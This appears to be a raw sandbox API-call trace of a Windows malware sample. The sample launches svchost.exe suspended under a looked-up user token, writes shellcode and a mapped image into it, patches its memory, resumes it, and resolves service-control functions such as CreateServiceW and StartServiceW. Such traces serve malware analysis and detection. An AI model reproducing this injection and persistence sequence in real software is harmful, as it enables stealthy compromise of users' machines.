	[0230.075] GetTokenInformation (in: TokenHandle=0x5c8, TokenInformationClass=0x1, TokenInformation=0x22a6340, TokenInformationLength=0x24, ReturnLength=0x1286a0 | out: TokenInformation=0x22a6340, ReturnLength=0x1286a0) returned 1
	[0230.075] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x22a6348*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x1282c0, cchName=0x128680, ReferencedDomainName=0x1280c0, cchReferencedDomainName=0x128680, peUse=0x128658 | out: Name="2XC7u663GxWc", cchName=0x128680, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128680, peUse=0x128658) returned 1
	[0230.075] LoadUserProfileW () returned 0x1
	[0230.080] CreateEnvironmentBlock () returned 0x1
	[0230.082] CreateProcessAsUserW (in: hToken=0x5c8, lpApplicationName=0x0, lpCommandLine="svchost.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000424, lpEnvironment=0x26cec08, lpCurrentDirectory=0x0, lpStartupInfo=0x1285d4*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="taskeng.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x81, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1d68c8, hStdOutput=0x2777c18, hStdError=0x1d6c70), lpProcessInformation=0x128648 | out: lpCommandLine="svchost.exe", lpProcessInformation=0x128648*(hProcess=0x5b4, hThread=0x5e4, dwProcessId=0xda0, dwThreadId=0xd90)) returned 1
	[0230.084] UnloadUserProfile () returned 0x1
	[0230.087] CloseHandle (hObject=0x5c8) returned 1
	[0230.087] DestroyEnvironmentBlock () returned 0x1
	[0230.087] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6340) returned 1
	[0230.087] AdjustTokenPrivileges (in: TokenHandle=0x60c, DisableAllPrivileges=0, NewState=0x128618, BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0230.087] CloseHandle (hObject=0x60c) returned 1
	[0230.088] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777c18) returned 1
	[0230.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777c18
	[0230.088] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x60c
	[0230.088] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5c8
	[0230.088] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x540
	[0230.088] GetCurrentProcess () returned 0xffffffff
	[0230.088] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x60c, hTargetProcessHandle=0x5b4, lpTargetHandle=0x128720, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128720*=0x4) returned 1
	[0230.088] GetCurrentProcess () returned 0xffffffff
	[0230.088] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x5c8, hTargetProcessHandle=0x5b4, lpTargetHandle=0x128724, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128724*=0x8) returned 1
	[0230.088] GetCurrentProcess () returned 0xffffffff
	[0230.088] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x540, hTargetProcessHandle=0x5b4, lpTargetHandle=0x128728, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x128728*=0xc) returned 1
	[0230.088] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x16f, flAllocationType=0x3000, flProtect=0x40) returned 0x50000
	[0230.088] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x50000, lpBuffer=0xd712d0*, nSize=0x16f, lpNumberOfBytesWritten=0x1285cc | out: lpBuffer=0xd712d0*, lpNumberOfBytesWritten=0x1285cc*=0x16f) returned 1
	[0230.089] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.089] GetProcAddress (hModule=0x76b10000, lpProcName="SignalObjectAndWait") returned 0x76b761d9
	[0230.089] GetProcAddress (hModule=0x76b10000, lpProcName="WaitForSingleObject") returned 0x76b5ba90
	[0230.089] GetProcAddress (hModule=0x76b10000, lpProcName="CloseHandle") returned 0x76b5ca7c
	[0230.090] GetProcAddress (hModule=0x76b10000, lpProcName="ResetEvent") returned 0x76b5bcb4
	[0230.090] GetProcAddress (hModule=0x76b10000, lpProcName="ExitProcess") returned 0x76b6214f
	[0230.090] GetProcAddress (hModule=0x76b10000, lpProcName="InitializeCriticalSection") returned 0x7738a149
	[0230.090] GetProcAddress (hModule=0x76b10000, lpProcName="EnterCriticalSection") returned 0x773777a0
	[0230.090] GetProcAddress (hModule=0x76b10000, lpProcName="LeaveCriticalSection") returned 0x77377760
	[0230.090] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x40) returned 0xa0000
	[0230.090] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128720*, nSize=0x70, lpNumberOfBytesWritten=0x1285cc | out: lpBuffer=0x128720*, lpNumberOfBytesWritten=0x1285cc*=0x70) returned 1
	[0230.091] NtQueryInformationProcess (in: ProcessHandle=0x5b4, ProcessInformationClass=0x0, ProcessInformation=0x1285b4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x1285b4, ReturnLength=0x0) returned 0x0
	[0230.091] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x7ffdf000, lpBuffer=0x1285cc, nSize=0x10, lpNumberOfBytesRead=0x128458 | out: lpBuffer=0x1285cc*, lpNumberOfBytesRead=0x128458*=0x10) returned 1
	[0230.091] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x600000, lpBuffer=0x128574, nSize=0x40, lpNumberOfBytesRead=0x128458 | out: lpBuffer=0x128574*, lpNumberOfBytesRead=0x128458*=0x40) returned 1
	[0230.091] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6000d8, lpBuffer=0x12847c, nSize=0xf8, lpNumberOfBytesRead=0x128458 | out: lpBuffer=0x12847c*, lpNumberOfBytesRead=0x128458*=0xf8) returned 1
	[0230.091] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x602104, lpBuffer=0x128790*, nSize=0xc, lpNumberOfBytesWritten=0x1285cc | out: lpBuffer=0x128790*, lpNumberOfBytesWritten=0x1285cc*=0xc) returned 1
	[0230.091] ResetEvent (hEvent=0x5c8) returned 1
	[0230.091] ResetEvent (hEvent=0x60c) returned 1
	[0230.091] ResumeThread (hThread=0x5e4) returned 0x1
	[0230.101] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.101] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x6cd40000, dwSize=0x9000, flAllocationType=0x2000, flProtect=0x40) returned 0x6cd40000
	[0230.102] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x6cd40000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd40000
	[0230.102] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd40000, lpBuffer=0x274e360*, nSize=0x400, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x274e360*, lpNumberOfBytesWritten=0x1286f4*=0x400) returned 1
	[0230.102] VirtualProtectEx (in: hProcess=0x5b4, lpAddress=0x6cd40000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x1286f4 | out: lpflOldProtect=0x1286f4*=0x4) returned 1
	[0230.102] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x6cd41000, dwSize=0x1600, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd41000
	[0230.102] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1600) returned 0x264ed0
	[0230.102] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd41000, lpBuffer=0x264ed0*, nSize=0x1600, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x264ed0*, lpNumberOfBytesWritten=0x1286e0*=0x1600) returned 1
	[0230.103] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd41000, lpBuffer=0x274e760*, nSize=0x1600, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x274e760*, lpNumberOfBytesWritten=0x1286f4*=0x1600) returned 1
	[0230.103] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x6cd43000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd43000
	[0230.103] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x264ed0, Size=0x200) returned 0x264ed0
	[0230.104] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd43000, lpBuffer=0x264ed0*, nSize=0x200, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x264ed0*, lpNumberOfBytesWritten=0x1286e0*=0x200) returned 1
	[0230.104] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd43000, lpBuffer=0x274fd60*, nSize=0x200, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x274fd60*, lpNumberOfBytesWritten=0x1286f4*=0x200) returned 1
	[0230.104] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x6cd44000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd44000
	[0230.104] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x264ed0, Size=0x200) returned 0x264ed0
	[0230.104] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd44000, lpBuffer=0x264ed0*, nSize=0x200, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x264ed0*, lpNumberOfBytesWritten=0x1286e0*=0x200) returned 1
	[0230.105] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd44000, lpBuffer=0x274ff60*, nSize=0x200, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x274ff60*, lpNumberOfBytesWritten=0x1286f4*=0x200) returned 1
	[0230.105] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x6cd45000, dwSize=0x24, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd45000
	[0230.105] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x264ed0, Size=0x30) returned 0x264ed0
	[0230.105] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd45000, lpBuffer=0x264ed0*, nSize=0x24, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x264ed0*, lpNumberOfBytesWritten=0x1286e0*=0x24) returned 1
	[0230.106] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x6cd46000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd46000
	[0230.106] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x264ed0, Size=0x200) returned 0x264ed0
	[0230.106] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd46000, lpBuffer=0x264ed0*, nSize=0x200, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x264ed0*, lpNumberOfBytesWritten=0x1286e0*=0x200) returned 1
	[0230.106] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd46000, lpBuffer=0x2750160*, nSize=0x200, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x2750160*, lpNumberOfBytesWritten=0x1286f4*=0x200) returned 1
	[0230.106] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x6cd47000, dwSize=0x600, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd47000
	[0230.107] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x264ed0, Size=0x600) returned 0x264ed0
	[0230.107] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47000, lpBuffer=0x264ed0*, nSize=0x600, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x264ed0*, lpNumberOfBytesWritten=0x1286e0*=0x600) returned 1
	[0230.107] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47000, lpBuffer=0x2750360*, nSize=0x600, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x2750360*, lpNumberOfBytesWritten=0x1286f4*=0x600) returned 1
	[0230.107] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x6cd48000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x6cd48000
	[0230.107] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x264ed0, Size=0x200) returned 0x264ed0
	[0230.107] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd48000, lpBuffer=0x264ed0*, nSize=0x200, lpNumberOfBytesWritten=0x1286e0 | out: lpBuffer=0x264ed0*, lpNumberOfBytesWritten=0x1286e0*=0x200) returned 1
	[0230.108] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd48000, lpBuffer=0x2750960*, nSize=0x200, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x2750960*, lpNumberOfBytesWritten=0x1286f4*=0x200) returned 1
	[0230.108] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.108] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0230.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27507c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0230.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778460
	[0230.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27507c8, cbMultiByte=-1, lpWideCharStr=0x2778460, cchWideChar=13 | out: lpWideCharStr="ADVAPI32.dll") returned 13
	[0230.109] lstrlenW (lpString="ADVAPI32.dll") returned 12
	[0230.109] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.109] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2778460*, nSize=0x1a, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2778460*, lpNumberOfBytesWritten=0x12858c*=0x1a) returned 1
	[0230.109] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128510 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128510*=0x70) returned 1
	[0230.109] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.109] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.109] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0xc, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128508*=0xc) returned 1
	[0230.110] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530*, nSize=0x70, lpNumberOfBytesWritten=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesWritten=0x128508*=0x70) returned 1
	[0230.110] ResetEvent (hEvent=0x60c) returned 1
	[0230.110] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.135] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x128530, nSize=0x70, lpNumberOfBytesRead=0x128508 | out: lpBuffer=0x128530*, lpNumberOfBytesRead=0x128508*=0x70) returned 1
	[0230.135] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.136] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.136] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778460) returned 1
	[0230.136] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.136] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.136] lstrlenA (lpString="CloseServiceHandle") returned 18
	[0230.136] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.136] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750546*, nSize=0x13, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750546*, lpNumberOfBytesWritten=0x12858c*=0x13) returned 1
	[0230.137] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.137] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.137] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.137] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.138] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.138] ResetEvent (hEvent=0x60c) returned 1
	[0230.138] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.139] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.139] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.139] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.139] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.139] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47138, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.139] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.140] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.140] lstrlenA (lpString="CreateServiceW") returned 14
	[0230.140] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.140] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x275055c*, nSize=0xf, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x275055c*, lpNumberOfBytesWritten=0x12858c*=0xf) returned 1
	[0230.140] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.140] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.140] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.140] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.141] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.141] ResetEvent (hEvent=0x60c) returned 1
	[0230.141] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.141] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.141] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.141] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.141] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.141] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd4713c, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.142] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.142] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.142] lstrlenA (lpString="OpenSCManagerW") returned 14
	[0230.142] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.142] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x275056e*, nSize=0xf, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x275056e*, lpNumberOfBytesWritten=0x12858c*=0xf) returned 1
	[0230.142] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.142] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.142] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.143] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.143] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.143] ResetEvent (hEvent=0x60c) returned 1
	[0230.143] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.143] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.143] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.144] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.144] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.144] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47140, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.144] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.144] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0230.144] lstrlenA (lpString="StartServiceW") returned 13
	[0230.144] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.144] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2750580*, nSize=0xe, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2750580*, lpNumberOfBytesWritten=0x12858c*=0xe) returned 1
	[0230.145] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x12850c | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x12850c*=0x70) returned 1
	[0230.145] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0230.145] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x40) returned 0xb0000
	[0230.145] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xb0000, lpBuffer=0x22ffe70*, nSize=0x10, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x22ffe70*, lpNumberOfBytesWritten=0x128504*=0x10) returned 1
	[0230.145] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c*, nSize=0x70, lpNumberOfBytesWritten=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesWritten=0x128504*=0x70) returned 1
	[0230.145] ResetEvent (hEvent=0x60c) returned 1
	[0230.145] SignalObjectAndWait (hObjectToSignal=0x5c8, hObjectToWaitOn=0x60c, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0230.146] ReadProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0xa0000, lpBuffer=0x12852c, nSize=0x70, lpNumberOfBytesRead=0x128504 | out: lpBuffer=0x12852c*, lpNumberOfBytesRead=0x128504*=0x70) returned 1
	[0230.146] VirtualFreeEx (hProcess=0x5b4, lpAddress=0xb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.146] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0230.146] VirtualFreeEx (hProcess=0x5b4, lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0230.146] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x6cd47144, lpBuffer=0x1287ac*, nSize=0x4, lpNumberOfBytesWritten=0x1286f4 | out: lpBuffer=0x1287ac*, lpNumberOfBytesWritten=0x1286f4*=0x4) returned 1
	[0230.146] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76b10000
	[0230.147] GetProcAddress (hModule=0x76b10000, lpProcName="LoadLibraryW") returned 0x76b63c01
	[0230.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275081c, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0230.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778460
	[0230.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275081c, cbMultiByte=-1, lpWideCharStr=0x2778460, cchWideChar=13 | out: lpWideCharStr="KERNEL32.dll") returned 13
	[0230.147] lstrlenW (lpString="KERNEL32.dll") returned 12
	[0230.147] VirtualAllocEx (hProcess=0x5b4, lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x40) returned 0x20000
	[0230.147] WriteProcessMemory (in: hProcess=0x5b4, lpBaseAddress=0x20000, lpBuffer=0x2778460*, nSize=0x1a, lpNumberOfBytesWritten=0x12858c | out: lpBuffer=0x2778460*, lpNumberOfBytesWritten=0x12858c*=0x1a) returned 1
